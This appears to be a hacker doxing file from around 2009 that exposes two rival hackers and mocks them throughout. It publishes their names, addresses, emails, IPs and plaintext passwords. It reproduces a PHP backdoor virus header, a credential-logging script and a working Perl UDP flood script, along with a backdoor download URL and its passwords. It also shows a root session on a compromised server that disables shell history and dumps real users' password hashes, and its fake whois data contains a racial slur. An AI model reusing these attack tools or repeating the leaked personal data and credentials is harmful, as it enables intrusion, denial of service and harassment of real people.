// You ever thought about Economical Crisis ?
|
||
|
||
|
||
Faisal Hourani they don't call me romeo for jack :P
|
||
Faisal took the How dateable are you? quiz and the result is COMPLETLY DATEABLE!
|
||
You are the perfect gentleman/lady and you know everything anybody needs to know about dating and flirting
|
||
July 6 at 7:00pm via How dateable are you?
|
||
|
||
// rawr :] lulz
|
||
|
||
|
||
"I can't believe that out of 10,000 sperm, you were the quickest."
|
||
~ Steven Pearl
|
||
|
||
|
||
<?php // DarkMindZ.com
######################################
# [ DarkMindZ PHP.Virus v1.5 ] #
# [ RoMeO ] #
######################################
set_time_limit(0);
ignore_user_abort(1);
# root@darkmindz.com~ cat /home/pr0jects/virus/intro
# DMZ PHP.Virus, very simple PHP virus, that would do the following:
# |1| Look for all PHP files in directory.
# |2| Check if infected.
# |3| Infect with your backdoor.
# |4| Log all infected files, and optional mail them to you.
# root@darkmindz.com~ exit

# [ To-Do ] #
# Mass infector, infect other users on server.
# Better Reports, some system info reports too.
# Spreading, by RFI dorks.
# Polymorphism //Arxidia!
#[x] Change user-agent used, 2 backdoors, `include and a CMD exec`. - done a better job here, one backdoor, includes all that :]

// Careful not to infect yourself.. There is a polymorphic flu virus on the loose that spreads through RFI..

LoginLog By: RoMeO[DarkMindZ.com]
|
||
|
||
Login Log
|
||
<?php
|
||
##################################################
|
||
# LoginLog By: RoMeO[DarkMindZ.com]
|
||
##################################################
|
||
|
||
$saveinsql = 1; # shall we log it in SQL?
|
||
$table = "mylogs";
|
||
$passf = "passw0rd";
|
||
$usrfield = "usern4me";
|
||
$host = "localhost";
|
||
$usr = "roooooooot";
|
||
$pw = "w0000000t";
|
||
$sqldb = "whatever";
|
||
|
||
if($saveinsql) {
|
||
mysql_connect($host, $usr, $pw);
|
||
mysql_select_db($sqldb);
|
||
}
|
||
|
||
$username = $_GET["u"];
|
||
$password = $_GET["p"];
|
||
|
||
|
||
function logit($user, $pass) {
|
||
$file = fopen('_my_log.txt', 'w');
|
||
fwrite($file, "$user:$pass\n");
|
||
fclose($file);
|
||
}
|
||
|
||
function mysqlentry($table, $pass, $user) {
|
||
|
||
$check1 = "SELECT * FROM `$table` WHERE $userf = '$user'";
|
||
$query1 = mysql_query($check1);
|
||
if (!mysql_num_rows($query1) {
|
||
$ok = "INSERT INTO `$table` (`$userf`, `$passf`) VALUES ('$user', '$pass')";
|
||
mysql_query($ok);
|
||
}
|
||
else { $update = "UPDATE $table SET $passf = '$pass' WHERE $userf = '$user'";
|
||
mysql_query($update);
|
||
}
|
||
mysql_close;
|
||
}
|
||
|
||
if(isset($username) && isset($password)) {
|
||
logit($username, $password);
|
||
mysqlentry($table, $password, $username);
|
||
}
|
||
?>
|
||
|
||
ref: http://nepalimadbulls.wetpaint.com/page/Login+Log
|
||
|
||
// As a skiddie, you are NOT supposed to know how to secure your own code..
|
||
|
||
|
||
(4954,'RoMeO',1188441098,0,0,'',0,'',0,0,'','','','5921174f5ef40f7765dee53b4722426b','romeo.haxxor@gmail.com','',0,'0001-01-01','','','','','','','',0,1,'','',0,'',0,0,0,'',1,1,0,2,'','','','',0,1,'',0,'','',0,0,'',0,'',NULL)
|
||
(5033,'RoMeO',1188441098,46,0,'',1207945792,'RoMeO',2,0,'','5921174f5ef40f7765dee53b4722426b','romeo.haxxor@gmail.com','DarkMindZ',1,'1991-02-02','DarkMindZ','http://www.darkmindz.com','DarkMindZ','','','','romeo@darkmindz.com',0,1,'','I Learn The Rules To Break Them',0,'',1,0,0,'',1,1,'77.30.170.77','','',2,1,'',30843,'','',23,106496,'',0,0,130,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'0',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,2,1,2,2,1,2,1,41,267,'down')
|
||
|
||
IP address: 77.30.170.77
|
||
Reverse DNS: 77.30.170.77.dynamic.saudi.net.sa.
|
||
Reverse DNS authenticity: [Could be forged: hostname 77.30.170.77.dynamic.saudi.net.sa. does not exist]
|
||
ASN: 25019
|
||
ASN Name: SAUDINETSTC-AS
|
||
IP range connectivity: 5
|
||
Registrar (per ASN): RIPE
|
||
Country (per IP registrar): SA [Saudi Arabia]
|
||
Country Currency: SAR [Saudi Arabia Riyals]
|
||
Country IP Range: 77.30.0.0 to 77.31.255.255
|
||
Country fraud profile: Normal
|
||
City (per outside source): Riyadh, Ar Riyad
|
||
Country (per outside source): SA [Saudi Arabia]
|
||
Private (internal) IP? No
|
||
IP address registrar: whois.arin.net
|
||
Known Proxy? No
|
||
Link for WHOIS: 77.30.170.77
|
||
|
||
(23440,701,41,1188442878,5033,'Re: POLL - ALL MEMBERS MUST READ AND VOTE!','RoMeO','romeo.haxxor@gmail.com','89.5.78.7',1,1188492293,'0rijin4l','0rijin4l got me here','xx'),(
|
||
|
||
IP address: 89.5.78.7
|
||
Reverse DNS: dynamic.dsl.nesma.net.sa.
|
||
Reverse DNS authenticity: [Could be forged: hostname dynamic.dsl.nesma.net.sa. does not exist]
|
||
ASN: 24731
|
||
ASN Name: ASN-NESMA (National Engineering Services and Marketing Company Ltd. (NESMA))
|
||
IP range connectivity: 1
|
||
Registrar (per ASN): RIPE
|
||
Country (per IP registrar): SA [Saudi Arabia]
|
||
Country Currency: SAR [Saudi Arabia Riyals]
|
||
Country IP Range: 89.4.0.0 to 89.5.255.255
|
||
Country fraud profile: Normal
|
||
City (per outside source): Riyadh, Ar Riyad
|
||
Country (per outside source): SA [Saudi Arabia]
|
||
Private (internal) IP? No
|
||
IP address registrar: whois.ripe.net
|
||
Known Proxy? No
|
||
Link for WHOIS: 89.5.78.7
|
||
|
||
ref: http://www.gonullyourself.org/ezines/G-line/G-line.4.txt
|
||
|
||
|
||
|
||
----- darkmindz.com -----

-----------------
Host's addresses:
-----------------
darkmindz.com. 5 IN A 69.42.209.54

-------------
Name servers:
-------------
ns6.hr-development.net. 5 IN A 69.42.209.51
ns5.hr-development.net. 5 IN A 69.42.209.50

-----------
MX record:
-----------
aspmx.l.google.com. 5 IN A 209.85.219.58

---------------------
Trying Zonetransfers:
---------------------

trying zonetransfer for darkmindz.com on ns6.hr-development.net ...

trying zonetransfer for darkmindz.com on ns5.hr-development.net ...

------------------------------
Brute forcing with dns.txt:
------------------------------
ftp.darkmindz.com. 5 IN A 69.42.209.54
mail.darkmindz.com. 5 IN A 69.42.209.54
pop.darkmindz.com. 5 IN A 69.42.209.54
smtp.darkmindz.com. 5 IN A 69.42.209.54
www.darkmindz.com. 5 IN A 69.42.209.54

-------------------------------
darkmindz.com c class netranges:
-------------------------------
69.42.209.0/24

----- cybershade.org -----

-----------------
Host's addresses:
-----------------
cybershade.org. 5 IN A 69.42.209.54

-------------
Name servers:
-------------
ns6.hr-development.net. 5 IN A 69.42.209.51
ns5.hr-development.net. 5 IN A 69.42.209.50

-----------
MX record:
-----------
mail.cybershade.org. 5 IN A 69.42.209.54

---------------------
Trying Zonetransfers:
---------------------

trying zonetransfer for cybershade.org on ns6.hr-development.net ...

trying zonetransfer for cybershade.org on ns5.hr-development.net ...

------------------------------
Brute forcing with dns.txt:
------------------------------
ftp.cybershade.org. 5 IN A 69.42.209.54
mail.cybershade.org. 5 IN A 69.42.209.54
pop.cybershade.org. 5 IN A 69.42.209.54
smtp.cybershade.org. 5 IN A 69.42.209.54
www.cybershade.org. 5 IN A 69.42.209.54

-------------------------------
cybershade.org c class netranges:
-------------------------------
69.42.209.0/24

2) pimpinjg
|
||
|
||
Real Name: Jason
|
||
Country: United States
|
||
State: California
|
||
Address:
|
||
Age: 38
|
||
Birthday: July 18, 1971
|
||
Daughter Name: Dakota
|
||
Phone Number:
|
||
Nickname: pimpinjg
|
||
MSN: pimpinjg@hr-development.net
|
||
ICQ: 574404127
|
||
Skype: pimpinjg
|
||
Emails: pimpinjg@hr-development.net, pimpinjg@hotmail.com, pimpinjg4@aol.com, pimpinjg@linuxmail.org
|
||
ISP Network Range(s): 76.80.0.0 to 76.95.255.255, 76.160.0.0 to 76.175.255.255
|
||
Domains: h4ckinab0x.com, teamhbx.com, project-h4x0r.com, copyandpaste.info, anti-sec.net, pimpinjg.net, super-syn.net
|
||
Domain Hosting: hr-development.net
|
||
Domain Name Servers: ns5.hr-development.net, ns6.hr-development.net
|
||
Company: hr-development.net
|
||
Skills: DDOS Flooder and Anti-DDOS Specialist :D _none_
|
||
PsyBNC Host(s): *.deploy.akamaitechnologies.com, complete.ownage.net (72.20.17.206)
|
||
Plain Password(s): joeybe11, 1b6m9p34nz, h4ckinab0x, 1ssgy0ZACGUZFS
|
||
Hash Password(s): e93567696318487f84ea635b1e617d5a, $1$D0PGDf.U$6IyagtS0AYLnTXI4DiPmh1,
|
||
Real IP(s): 76.175.20.182, 76.175.18.227, 76.94.14.130, 76.175.18.227
|
||
Common Bash Commands: nano, wget :D
|
||
IRC Friends: RoMeO, garrett
|
||
Affiliates: thedefaced.org, darkmindz.com
|
||
Operating System(s): Ubuntu 8.10, Windows Vista
|
||
|
||
|
||
-
|
||
pimpinjg is pimpinjg@cloaked-1243C38A.deploy.akamaitechnologies.com * Pimpinjg
|
||
pimpinjg is using modes +iwrxt
|
||
pimpinig is connecting from *@cpe-76-175-20-182.socal.res.rr.com 76.175.20.182
|
||
pimpinjg is a registered nick
|
||
pimpinjg on #underground_systems #astalavista &#darkmindz
|
||
pimpinjg using twofish.securitychat.org SecurityChat.org ircd
|
||
pimpinjg has been idle 54mins 58secs, signed on Sun Jun 21 10:21:02
|
||
pimpinjg End of /WHOIS list.
|
||
|
||
|
||
|
||
/******************************************************************************************
|
||
* pimp.shell priv release for my baby joeybe11 Ballcanc3r and myself ;)
|
||
*
|
||
*
|
||
* New Mods (added by me) --
|
||
+--------------------------------------------------------+
|
||
* added proxy shit
|
||
* removed images for less crap in the logs
|
||
* added cpanel finder (thx to ackit)
|
||
* added rfi/lfi finder (thx to ackit)
|
||
* other shit i cba putting here
|
||
+--------------------------------------------------------+
|
||
* shit to remove --
|
||
+--------------------------------------------------------+
|
||
* - a bunch of stupid code things (example: echo("$msg"); (wtf... :S))
|
||
*********************************************************/
|
||
|
||
// Private 0Day Exploits, Backdoors, Shells, Privacy.. u name it.. not so private anymore..
|
||
|
||
|
||
H4ckinab0x.com on 2008-03-12 - Domain History
|
||
|
||
Registrant:
|
||
project-h4x0r
|
||
430 west imperial highway 16
|
||
brea, California 92821
|
||
United States
|
||
|
||
Domain Name: H4CKINAB0X.COM
|
||
Created on: 11-Mar-08
|
||
Expires on: 11-Mar-09
|
||
Last Updated on: 11-Mar-08
|
||
|
||
Administrative Contact:
|
||
Gleason, rex pimpinjg4@aol.com
|
||
project-h4x0r
|
||
430 west imperial highway 16
|
||
brea, California 92821
|
||
United States
|
||
(714) 529-4264 Fax --
|
||
|
||
|
||
Project-h4x0r.com on 2008-02-16 - Domain History
|
||
|
||
Registrant:
|
||
project-h4x0r
|
||
432 west imperial highway 16
|
||
brea, California 92821
|
||
United States
|
||
|
||
Domain Name: PROJECT-H4X0R.COM
|
||
Created on: 13-Feb-08
|
||
Expires on: 14-Feb-10
|
||
Last Updated on: 14-Feb-08
|
||
|
||
Administrative Contact:
|
||
gleason, joshua pimpinjg4@aol.com
|
||
project-h4x0r
|
||
432 west imperial highway 16
|
||
brea, California 92821
|
||
United States
|
||
(714) 529-4234 Fax --
|
||
|
||
|
||
Teamhbx.com on 2008-09-05 - Domain History
|
||
|
||
Registrant:
|
||
h4ckinab0x
|
||
234 nigger street
|
||
nigger, California 11111
|
||
United States
|
||
|
||
Domain Name: TEAMHBX.COM
|
||
Created on: 03-Sep-08
|
||
Expires on: 03-Sep-09
|
||
Last Updated on: 03-Sep-08
|
||
|
||
Administrative Contact:
|
||
nigger, nigger pimpinjg4@aol.com
|
||
h4ckinab0x
|
||
234 nigger street
|
||
nigger, California 11111
|
||
United States
|
||
111111111 Fax --
|
||
|
||
|
||
|
||
Afraid.org Domains:

h4ckinab0x.com
(5 hosts in use) website private pimpinjg 192 days ago (01/22/2009)
copyandpaste.info
(7 hosts in use) website private pimpinjg 66 days ago (05/28/2009)
super-syn.net
(6 hosts in use) website private pimpinjg 1 day ago (08/02/2009)
anti-sec.net
(6 hosts in use) website private pimpinjg 2 days ago (07/05/2009)
Ref: http://www.baccomber.com/domain/registry/?page=363&sort=3&q=

// It's amazing what u can find on the net..

pimpinjg
im pimpinjg some of you may know me some of you may not last 2 years ive been studying to become a linux administrator
(wanna start a whitehat security company) i know my shit (you can verify with ViSiOn :hihihi: yeah so sup
Ref: http://madspot.org/forums/viewtopic.php?f=7&t=11107&start=0

// How's that going for you? Managed to start your "whitehat" security company? lulz

pimpinjg
Posted 19 October 2008 - 02:05 PM
i suck at introductions so anyways here i go my names pimpinjg ive been in hacking for about 8 months i am knowledgeable
in vb,C++, and php wanting to learn asm for reverse engineering and whatnot (and some destructive shit) own a
couple warez sites wont release the urls cuz advertising so yeah sup :)
ref: http://darktavern.org/forum/General-f3/Introduction-f20/Pimpinjg-t11469.html

// 8 months? Is this a bad joke or a tragedy?

pimpinjg
is there anyway to make it auto delete suspicious files becuz im getting backdoored and im not ready for an os reload
till i get a good backup..
ref: http://forum.configserver.com/showthread.php?p=4535

// Did your lover backdoor you? Do you drop the soap on command now?

----- copyandpaste.info -----
|
||
|
||
-----------------
|
||
Host's addresses:
|
||
-----------------
|
||
copyandpaste.info. 5 IN A 76.175.20.182
|
||
|
||
-------------
|
||
Name servers:
|
||
-------------
|
||
ns2.afraid.org. 5 IN A 66.252.5.14
|
||
ns4.afraid.org. 5 IN A 67.18.179.15
|
||
ns3.afraid.org. 5 IN A 72.20.15.62
|
||
ns1.afraid.org. 5 IN A 67.19.72.206
|
||
|
||
-----------
|
||
MX record:
|
||
-----------
|
||
aspmx.l.google.com. 5 IN A 209.85.219.26
|
||
|
||
---------------------
|
||
Trying Zonetransfers:
|
||
---------------------
|
||
|
||
trying zonetransfer for copyandpaste.info on ns2.afraid.org ...
|
||
|
||
trying zonetransfer for copyandpaste.info on ns3.afraid.org ...
|
||
|
||
trying zonetransfer for copyandpaste.info on ns4.afraid.org ...
|
||
|
||
trying zonetransfer for copyandpaste.info on ns1.afraid.org ...
|
||
|
||
------------------------------
|
||
Brute forcing with dns.txt:
|
||
------------------------------
|
||
ftp.copyandpaste.info. 5 IN A 67.19.72.202
|
||
irc.copyandpaste.info. 5 IN A 94.102.58.212
|
||
mail.copyandpaste.info. 5 IN A 67.19.72.202
|
||
www.copyandpaste.info. 5 IN CNAME copyandpaste.info.
|
||
copyandpaste.info. 5 IN A 76.175.20.182
|
||
|
||
-------------------------------
|
||
copyandpaste.info c class netranges:
|
||
-------------------------------
|
||
67.19.72.0/24
|
||
76.175.20.0/24
|
||
94.102.58.0/24
|
||
|
||
|
||
WebHostingTalk Rumors
---------------------

* 7/4/2009 1:19 am Heads up - Openssh 4.3* 0day
* 6/9/2009 7:38 am Astalavista got hacked
* 5/10/2009 9:15 am Post Your Server Uptime

ref: http://www.webhostingtalk.com/profile/HRDev%20Jason

// HR-Development.net the Anti-DDOS Specialist ? aka anti-sec?

HRDev Jason
New Member
Join Date: Mar 2009
Posts: 3
hm, just gona put a shot in the dark here, nowayout the security expert! aka 'glafkos' and (but not limited too) astalavista staff?

ref: http://www.webhostingtalk.com/showthread.php?p=6269877#post6269877

// Hm.. Jason (pimpinjg), did the 8 months of hacking made you a security expert?

06-09-2009, 08:38 AM
HRDev Jason
New Member
Join Date: Mar 2009
Posts: 3
looks like the same hacker group striked again?
pastebin.com/m592e1f1c
i wonder what his obsession is with astalavista staff?
and from the looks of it he has a 0day grsecurity exploit too, its getting really bad

ref: http://www.webhostingtalk.com/showthread.php?p=6227267#post6227267

// Being the anti-sec bitch, it is expected to spread misleading rumors like grsec, jail break and so on..

HRDev Jason
New Member
Join Date: Mar 2009
Posts: 3
This thread needs life! && bump
Intel(R) Pentium(R) 4 CPU 2.40GHz, 2gb Kingston (ddr2) ram 150GB WD HDD
[root@mercedes ~]# uptime
07:02:59 up 56 days, 20:06, 1 user, load average: 0.01, 0.05, 0.01
[root@mercedes ~]#

ref: http://www.webhostingtalk.com/showthread.php?p=6175336#post6175336

<html>
<head>
<title>romeo@mercedes~$</title> // romeo.copyandpaste.info
</head>
<body bgcolor="black" text="gray" link="gray" alink="gray" vlink="gray">
<pre>
<strong>
__ .__
_____ ____ _/ |_ |__| ______ ____ ____
\__ \ / \\ __\| | / ___/_/ __ \_/ ___\
/ __ \_| | \| | | | \___ \ \ ___/\ \___
(____ /|___| /|__| |__|/____ > \___ >\___ >
\/ \/ # rm -rf / \/ \/ \/Movement

~ Fuck full-disclosure
~ Fuck the security industry
~ Keep 0days private
~ Hack everyone you can and then hack some more
</strong>

http://i43.tinypic.com/21317c6.png // [root@mercedes ~]#

/* It is clear that you and RoMeO were sharing the same hr-dev server with the following domains:
*/



#!/usr/bin/perl
# udp
#flooder.pl coded by pimpinjg

print q{
====================================================
= =
= Coded By =
= =
= pimpinjg =
= =
= team h4ckinab0x =
= =
= h4ckinab0x.com =
= =
====================================================
};

use io::socket;

print "Host: ";
chop ($host = <stdin>);
print "Port: ";
chop ($port = <stdin>);

{
$sock = IO::Socket::INET->new (
PeerAddr => $host,
PeerPort => $port,
Proto => 'udp') || die "$! Make sure the IP/host or port number is correct";
}
packets:
while (1) {
$size = rand() * 200 * 2000;
print ("$host:$port packet size: $size\n");
send($sock, 0, $size);
}

ref: http://www.studentshangout.com/topic/99723-udp-flodder/

// anti-ddos specialist @ hr-dev..


_______ _______ ________
\ _ \ ___ __\ _ \ \_____ \
/ /_\ \\ \/ / /_\ \ _(__ <
\ \_/ \> <\ \_/ \/ \
\_____ /__/\_ \\_____ /______ /
\/ \/ \/ \/
__
______ _ ______ _____ ____ ____ ____ _____/ |_
/ _ \ \/ \/ / \\__ \ / ___\_/ __ \ / \_/ __ \ __\ ______
( <_> ) / | \/ __ \_/ /_/ > ___/ | | \ ___/| | /_____/
\____/ \/\_/|___| (____ /\___ / \___ > /\___| /\___ >__|
\/ \//_____/ \/ \/ \/ \/
__________ _________
\______ \_______ ____ / _____/ ____ ____
| ___/\_ __ \/ _ \\_____ \_/ __ \_/ ___\
| | | | \( <_> ) \ ___/\ \___
|____| |__| \____/_______ /\___ >\___ >
\/ \/ \/



/*
Random Backdoor Passwords: Sk3rhGLdYW, 0x3a0wnt, RAzDX1lFd8
Backdoor http://board.whois.co.kr/lol.tar.gz (malloc is your enemy)
*/

This is a private computer system which is restricted to authorized individuals.
Actual or attempted unauthorized use of this computer system will result in criminal
and/or civil prosecution. This system is owned by Vitalspeeds Corporation of Wisconsin.
To purchase an account please visit us at http://www.vitalspeeds.com.

FreeBSD 6.2-RELEASE-p3 (VITAL) #0: Sun Apr 15 19:59:55 PDT 2007


Welcome
to
___ ___ __ __ __ __
| | |__| |_.---.-.| |.-----.-----.-----.-----.--| |.-----.
| | | | _| _ || ||__ --| _ | -__| -__| _ ||__ --|
\_____/|__|____|___._||__||_____| __|_____|_____|_____||_____|
|__|



By entering or accessing this server, you hereby agree to the Acceptable
Use Policy and any other terms and conditions listed on our website.

Type 'vhosts' for a list of the virtual hosts that can be used on
this system. You can view this again by typing 'motd'.

Support can be obtained in #vitalspeeds on EFnet.

http://www.vitalspeeds.com/


Perm - All support requests should go through our Ticket system @
https://billing.vitalspeeds.com or IRC@EFnet #Vitalspeeds .

Commands: vhosts, BitchX
NOTE: Eggdrop/BNCS use ports over 35000.

April 12 2007 : Hard drive failure, all data is gone as we do not keep backups of shell accounts as per the terms of
service. Check your welcome email for user info etc.

+----------------------------[ Owned ]----------------------------+
| Hack everyone you can and then hack some more | // romeo.copyandpaste.info
| Owned[DC] v2 |
| _______ . _______ . _______ |
| Get in as anonymous, Leave with no trace. |
| |
+-----------------------------------------------------------------+
[ FreeBSD velocity.vitalspeeds.com 6.2-RELEASE-p3 i386 ]

6:30PM up 518 days, 6:58, 2 users, load averages: 0.33, 0.26, 0.24
yaquis ttyp1 ip72-223-92-235. Sun Jun 28 18:12 still logged in
yaquis ttyp1 ip72-223-92-235. Sun Jun 28 17:00 - 17:39 (00:38)
katsst ttyp1 cpe-75-84-149-5. Sun Jun 28 16:07 - 16:37 (00:30)
dark ftp modemcable089.1 Sun Jun 28 15:45 - 15:45 (00:00)
smash ttyp1 89.30.147.8 Sun Jun 28 15:30 - 15:50 (00:19)
[root@velocity:~]# w
6:30PM up 518 days, 6:58, 2 users, load averages: 0.43, 0.28, 0.25
USER TTY FROM LOGIN@ IDLE WHAT
romeo p0 :ttyp2:S.0 Thu11PM - irssi -h absolute.ownage.net
yaquis p1 ip72-223-92-235. 6:12PM - -bash (bash)


[root@velocity:~]# export HISTSIZE=0
[root@velocity:~]# export HISTFILE=/dev/null
[root@velocity:~]# env
TERM=vt100
SHELL=/usr/local/bin/bash
HISTSIZE=1500
SSH_CLIENT=1.3.3.7 6173 22
SSH_TTY=/dev/ttyp1
USER=root
SSH_AUTH_SOCK=/tmp/ssh-M0YqjqZvAN/agent.70342
PAGER=more
LSCOLORS=ExGxFxf5CxfgDxabagacad
MAIL=/var/mail/root
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/X11R6/bin
PWD=/root
EDITOR=pico
PS1=[\u@\h:\w]\$
SHLVL=1
HOME=/root
LOGNAME=root
SSH_CONNECTION=1.3.3.7 6173 72.20.28.205 22
HISTFILE=/dev/null
_=/usr/bin/env
[root@velocity:~]# w
7:36PM up 513 days, 8:04, 2 users, load averages: 0.43, 0.48, 0.43
USER TTY FROM LOGIN@ IDLE WHAT
romeo p9 :ttypf:S.0 Wed06AM 1 irssi -h absolute.ownage.net
pimpinjg pe cpe-76-175-20-18 Mon09PM 1:15 irssi -h 72.20.28.206 // points to copyandpaste.info
[root@velocity:/]# date
Tue Jun 23 20:30:52 CDT 2009
[root@velocity:/]# uname -a
FreeBSD velocity.vitalspeeds.com 6.2-RELEASE-p3 FreeBSD 6.2-RELEASE-p3 #0: Sun Apr 15 19:59:55 PDT 2007 root@velocity.vitalspeeds.com:/usr/obj/usr/src/sys/VITAL i386

[root@velocity:~]# sysctl -a | egrep -i 'hw.machine|hw.model|hw.ncpu'
hw.machine: i386
hw.model: Intel(R) Pentium(R) 4 CPU 2.80GHz
hw.ncpu: 1
hw.machine_arch: i386


[root@velocity:~]# ls -la
total 72
drwxr-xr-x 6 root wheel 512 Jun 26 02:08 ./
drwxr-xr-x 21 root wheel 512 Nov 5 2008 ../
-rw------- 1 root wheel 4356 Jun 11 08:02 .bash_history
-rw-r--r-- 2 root wheel 801 Jan 12 2007 .cshrc
-rw------- 1 root wheel 5 Apr 15 2007 .history
drwx------ 2 root wheel 512 Jun 11 10:25 .irssi/
-rw-r--r-- 1 root wheel 143 Jan 12 2007 .k5login
-rw------- 1 root wheel 35 Jun 25 16:35 .lesshst
-rw-r--r-- 1 root wheel 293 Jan 12 2007 .login
-rw------- 1 root wheel 2164 Jun 23 20:21 .lsof_velocity
-rw-r--r-- 2 root wheel 251 Jan 12 2007 .profile
drwx------ 2 root wheel 512 Apr 13 2007 .ssh/
drwxr-xr-x 2 root wheel 512 Jun 24 18:00 kernels/
drwxr-xr-x 2 root wheel 512 Nov 5 2008 supfiles/
-rwxr--r-- 1 root wheel 477 Nov 5 2008 update.sh*

[root@velocity:~]# lsof -i -n | grep ssh
sshd 43929 devil 3u IPv4 0xca224000 0t0 TCP *:search (LISTEN)
sshd 43929 devil 5u IPv6 0xca6b5cb0 0t0 TCP *:search (LISTEN)
sshd 43929 devil 7u IPv4 0xca0653a0 0t0 TCP 72.20.3.98:search->189.158.227.97:1036 (ESTABLISHED)
sshd 43929 devil 87u IPv4 0xcafd2570 0t0 TCP 72.20.28.196:51129->69.16.172.40:afs3-fileserver (ESTABLISHED)
sshd 43929 devil 154u IPv4 0xc98913a0 0t0 TCP 72.20.28.210:52054->82.196.213.250:ircd (ESTABLISHED)
sshd 43929 devil 167u IPv4 0xcc5a73a0 0t0 TCP 72.20.28.196:49651->84.208.29.17:afs3-fileserver (ESTABLISHED)
sshd 43929 devil 192u IPv4 0xcb023910 0t0 TCP 72.20.28.196:50866->69.16.172.34:afs3-fileserver (ESTABLISHED)
sshd 60220 root 3u IPv4 0xc92c9000 0t0 TCP 72.20.28.248:ssh->188.52.81.126:10662 (ESTABLISHED) // RoMeO Saudi Arabia
sshd 60382 root 3u IPv4 0xc50a51d0 0t0 TCP 72.20.28.248:ssh->188.52.81.126:10696 (ESTABLISHED)
sshd 64492 root 3u IPv6 0xcc1883a0 0t0 TCP *:ssh (LISTEN)
sshd 64492 root 4u IPv4 0xc970d3a0 0t0 TCP *:ssh (LISTEN)
sshd 74777 root 3u IPv4 0xc9dd8570 0t0 TCP 72.20.28.248:ssh->66.229.253.149:27655 (ESTABLISHED)
sshd 74779 ioplex 3u IPv4 0xc9dd8570 0t0 TCP 72.20.28.248:ssh->66.229.253.149:27655 (ESTABLISHED)
sshd 74779 ioplex 7u IPv4 0xc9f58cb0 0t0 TCP 127.0.0.1:56073->127.0.0.1:48259 (ESTABLISHED)
sshd 74779 ioplex 8u IPv4 0xc91ff1d0 0t0 TCP 127.0.0.1:57500->127.0.0.1:48259 (ESTABLISHED)
sshd 74779 ioplex 9u IPv4 0xc6230910 0t0 TCP 127.0.0.1:64660->127.0.0.1:48259 (ESTABLISHED)
sshd 74779 ioplex 10u IPv4 0xc9a37ae0 0t0 TCP 127.0.0.1:49761->127.0.0.1:48259 (ESTABLISHED)
sshd 74779 ioplex 12u IPv4 0xc9a93740 0t0 TCP 127.0.0.1:64920->127.0.0.1:48259 (ESTABLISHED)
sshd 74779 ioplex 13u IPv4 0xc97d21d0 0t0 TCP 127.0.0.1:52350->127.0.0.1:48259 (ESTABLISHED)
sshd 74779 ioplex 14u IPv4 0xc5c30000 0t0 TCP 127.0.0.1:51650->127.0.0.1:48259 (ESTABLISHED)
sshd 74779 ioplex 15u IPv4 0xca1cf1d0 0t0 TCP 127.0.0.1:49153->127.0.0.1:48259 (ESTABLISHED)
sshd 74779 ioplex 16u IPv4 0xcc1731d0 0t0 TCP 127.0.0.1:51808->127.0.0.1:48259 (ESTABLISHED)
sshd 74779 ioplex 17u IPv4 0xcc592cb0 0t0 TCP 127.0.0.1:53451->127.0.0.1:48259 (ESTABLISHED)
[root@velocity:~]#

[root@velocity:/var/run]# cat /etc/passwd
romeo:*:1348:1348:User &:/home/romeo:/usr/local/bin/bash // Luv birdz
pimpinjg:*:1349:1349:pimp:/home/pimpinjg:/usr/local/bin/bash xxx

[root@velocity:/var/run]# cat /etc/master.passwd
|
||
yaquis:$1$68F1SID1$b9H5Bbj/fNYsvUhqgpr9Q1:1266:1266::0:0:User &:/home/yaquis:/usr/local/bin/bash
|
||
bpunux:$1$SqaNE5JP$bp1vJn3I4Rr6oZ6eJAmvz0:1269:1269::0:0:User &:/home/bpunux:/usr/local/bin/bash
|
||
skypilot:$1$0iDevIYV$Oi53AE7YFrB6AaBnAfcn7.:1271:1271::0:0:User &:/home/skypilot:/usr/local/bin/bash
|
||
blake96:$1$KwitdaYi$2EyIIukI8gEIxZCHwwj4U.:1272:1272::0:0:User &:/home/blake96:/usr/local/bin/bash
|
||
blotch:$1$rYr2mFcV$HPpQFgQacg4ScPjvNfYR31:1274:1274::0:0:User &:/home/blotch:/usr/local/bin/bash
|
||
scouse:$1$du5wftbl$lVamWsT/nEKT75D/IelEI/:1275:1275::0:0:User &:/home/scouse:/usr/local/bin/bash
|
||
mogle3:$1$Fo7FY4Sw$ioqHiMhZ/8BBDZjg39BR41:1276:1276::0:0:User &:/home/mogle3:/usr/local/bin/bash
|
||
ste:$1$H4hxohFI$se6RPLcCpkl/LY4aUiov6.:1277:1277::0:0:User &:/home/ste:/usr/local/bin/bash
|
||
omgwtf:$1$eK9d4q9r$eCZMCR.GRqmt6oOhrbam11:1281:1281::0:0:User &:/home/omgwtf:/usr/local/bin/bash
|
||
brosb4:$1$NQd5q63M$62LY3LnPxuPbrBmTANOkm1:1283:1283::0:0:User &:/home/brosb4:/usr/local/bin/bash
|
||
mindben:$1$xrm2x1nF$DnA.Wkg4q9ImdLOA75IT00:1284:1284::0:0:User &:/home/mindben:/usr/local/bin/bash
|
||
hixk:$1$p2dRk8OC$XpC/2o0jwotue0Tmbdr3R0:1286:1286::0:0:User &:/home/hixk:/usr/local/bin/bash
|
||
omen:$1$eT86NXcE$.ouer9/Fp/lv04NAhli5a1:1287:1287::0:0:User &:/home/omen:/usr/local/bin/bash
|
||
sakik1:$1$PujiBsEC$Syl3nyJzAObvu2UcpfbVd/:1290:1290::0:0:User &:/home/sakik1:/usr/local/bin/bash
|
||
chriys:$1$R0.IBcw2$VILPHOKDvQts2eyy6ndoK0:1291:1291::0:0:User &:/home/chriys:/usr/local/bin/bash
|
||
jtracy:$1$RxPgmSPJ$/O7J8PYHUMZHIx/4hJ0XE0:1292:1292::0:0:User &:/home/jtracy:/usr/local/bin/bash
|
||
roodyk:$1$0Bo4ZY89$ray17Ga4HpE2QtaFiHOg11:1293:1293::0:0:User &:/home/roodyk:/usr/local/bin/bash
|
||
qfx:$1$miBfwHok$ODKoxjFkZSYxfQqzQX96A1:1295:1295::0:0:User &:/home/qfx:/usr/local/bin/bash
|
||
